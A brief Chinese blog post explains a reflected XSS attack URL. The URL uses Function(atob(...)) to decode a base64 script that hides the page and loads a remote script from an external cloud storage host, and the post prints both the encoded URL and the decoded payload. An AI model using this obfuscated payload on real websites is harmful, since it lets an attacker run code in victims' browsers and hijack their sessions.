Loading

xss攻击atob

url:

http://xxx.xxx/location?param=Param%27%22;Function(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQoZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0JykpLnNyYz0nLy9iLWItY24ub3NzLWNuLWJlaWppbmcuYWxpeXVuY3MuY29tL3gnO3Rocm93IDA=%27))();throw%200;//

其中的atob内容为base64编码内容:

"document.documentElement.hidden=1;document.head.appendChild(document.createElement('script')).src='//b-b-cn.oss-cn-beijing.aliyuncs.com/x';";

param在界面会反显;会出现xss攻击;

 

posted @ 2020-04-03 17:10  stono  阅读(643)  评论(0编辑  收藏  举报